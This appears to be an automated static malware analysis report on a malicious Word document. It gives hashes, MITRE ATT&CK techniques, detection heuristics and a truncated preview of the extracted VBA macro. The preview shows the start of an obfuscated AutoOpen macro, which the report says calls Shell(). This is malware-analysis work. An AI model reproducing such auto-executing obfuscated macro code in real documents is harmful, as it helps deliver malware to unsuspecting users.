Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0234040badaf071d…

MALICIOUS

Office (OLE)

560.0 KB Created: 2017-06-28 16:15:00 Authoring application: Microsoft Office Word First seen: 2017-10-28
MD5: cf7cf39f47df5e98c4d142f3e6f40dce SHA-1: 0d1d51fdd95c253b88a7efbda56029144a310d55 SHA-256: 0234040badaf071d434b5a33d0f73e6ed49fdcff7a2164bda72ddd6a39d4b140
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and uses the Shell() function, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious payloads. The ClamAV detection also confirms its malicious nature.

Heuristics 7

  • ClamAV: Doc.Macro.Obfuscation-6331107-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6331107-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 81460 bytes
SHA-256: 701d05bd7a119284f0fe6385008440231624518c647c4a75c6ee20d22ecbe1da
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BfHZCs"
Sub AutoOpen()
uAQtaWmBy = -614 + 636
Select Case uAQtaWmBy
Case 9810 / 1635
jPjhTZgnA = 168
Case 495 - 476
uZ62IkbG = True
Case 47 + 7
uT0s7 = True
Case Else
pb3RcK = 168
End Select
KnMjP = -614 + 636
Select Case KnMjP
Case 9810 / 1635
lQxynO = 34094.395339746
Case 495 - 476
m92MkeSq = True
End Select
vQogye = 187 + 80
If vQogye = 9810 / 1635 Then
RksGDv = FH6D08lJs
Else
fkpRq = 34199.26947475
End If
rV3cM = RksGDv & fkpRq
KrdR9JU = 19110 / 455
Select Case KrdR9JU
Case 10145 - 10142
ExGHD = True
Case -740 + 771
zBaSd4eWj = 27778
Case 670 - 630
w7XpF = 96
Case Else
Z9NOuSZl = 60228.635483252
End Select
i1LJfPT = 19110 / 455
Select Case i1LJfPT
Case 10145 - 10142
T6DUbd1 = 48883.568023761
Case -740 + 771
kY7NR = 48883.568023761
Case 670 - 630
u9WXRC = 255
Case Else
DKDyY3RI = iGFsaT
End Select
YeR5U = 19110 / 455
Select Case YeR5U
Case 10145 - 10142
wLIhT64 = 6842
Case -740 + 771
XpzGmo = 42881.492484296
Case 670 - 630
sibNl = 36
End Select
Plq8RoV7j = 121 - 49
Select Case Plq8RoV7j
Case -3169 + 3172
ITn8lLOQA = -356693444
Case 25978 / 838
dhSfz = -27741
Case -627 + 662
b4RZH = True
End Select
iNXRl = 121 - 49
Select Case iNXRl
Case -3169 + 3172
rRClidUO = 130
End Select
Ow3VTF9M = 121 - 49
Select Case Ow3VTF9M
Case -3169 + 3172
YOPCL1BAZ = 42064.041526093
Case 25978 / 838
l6UyW7bR = 48755.761437766
Case -627 + 662
ydKgD = 74
End Select
jw7UyW = 8 + 71
Select Case jw7UyW
Case -2808 + 2810
USgqB8s = False
End Select
GO4WCu1 = 742 + 22
If GO4WCu1 = -2808 + 2810 Then
jewZI1jlN = 26446
End If
cJh97By = cJh97By & jewZI1jlN
weLMKtIER = 8 + 71
Select Case weLMKtIER
Case -2808 + 2810
yVQMLYTp0 = 170
Case -784 + 800
amRY2JX = 170
End Select
L94gJQP = 742 + 22
If L94gJQP = -2808 + 2810 Then
ueOG6Eb3 = -1694749206
End If
kMjp6 = kMjp6 & ueOG6Eb3
USiqsDwl = 8 + 71
Select Case USiqsDwl
Case -2808 + 2810
vinaej = 18560.181849477
Case -784 + 800
ncOBj0 = False
Case 259 - 204
Ie26PiM = 5582.1076778674
Case Else
BIpb94y = N3xDpQ
End Select
B3a597krJ = 256 - 136
Select Case B3a597krJ
Case -768 + 782
DnXfNGbV = True
Case 12863 / 677
yboTcIYg = pONyg9aZ
Case 1 + 50
tY4Tc = 13370
Case Else
jj7XZdcOF = 32984.985876926
End Select
Q6QcSChto = 583 + 16
If Q6QcSChto = -768 + 782 Then
ulwxK = 0
ElseIf Q6QcSChto = 12863 / 677 Then
IGbiSrLTa = 21138.122868529
Else
evhfIWpx = 8819
End If
DMQvtuHxc = ulwxK & IGbiSrLTa & evhfIWpx
ZQmOdK = 256 - 136
Select Case ZQmOdK
Case -768 + 782
VuXzI = True
End Select
MT7496 = 256 - 136
Select Case MT7496
Case -768 + 782
eRrfYt = 238
Case 12863 / 677
kGjue7DY = 238
Case 1 + 50
ucMxeF = 1231.5808959735
Case Else
qmxTdn = 61321.781155712
End Select
s19n4L = 21 + 78
Select Case s19n4L
Case 2177 - 2165
kuvBG9 = -362286442
Case 27 - 5
WEkbVqf = -362286442
Case 14792 / 344
BnPT9p = 22744
End Select
b24UtF = 1023 * 1
If b24UtF = 2177 - 2165 Then
xWJuCEf = 43606.160584505
ElseIf b24UtF = 27 - 5 Then
RntXe2q3 = 0
Else
uV7Wmh3BS = arh8M0
End If
JXMGWpm8 = xWJuCEf & RntXe2q3 & uV7Wmh3BS
wQtExu = 21 + 78
Select Case wQtExu
Case 2177 - 2165
rY1FT6P = 28922
Case 27 - 5
eMc3f = 22041.119276654
Case 14792 / 344
mZO8CPR = CpMS5Puy
Case Else
h8JkG7olh = 22041.119276654
End Select
FLXm27G = 969 - 6
If FLXm27G = 2292 - 2285 Then
qCxkB9nbw = True
ElseIf FLXm27G = 29203 / 1007 Then
FIy4FE = 43902.6955575
Else
bufEymHI = AIjLhzwrt
End If
U8QaR = qCxkB9nbw & FIy4FE & bufEymHI
jPyI8 = 969 - 6
If jPyI8 = 2292 - 2285 Then
VsgxAwSJq = 64072.017432483
ElseIf jPyI8 = 29203 / 1007 Then
fjiUEv = 64072.017432483
Else
qjI3a = DzGMsecW
End If
zwzgjAe = VsgxAwSJq & fjiUEv & qjI3a
wIVFqrW = 969 - 6
If wIVFqrW = 2292 - 2285 Then
BTdO7 = -270
ElseI
... (truncated)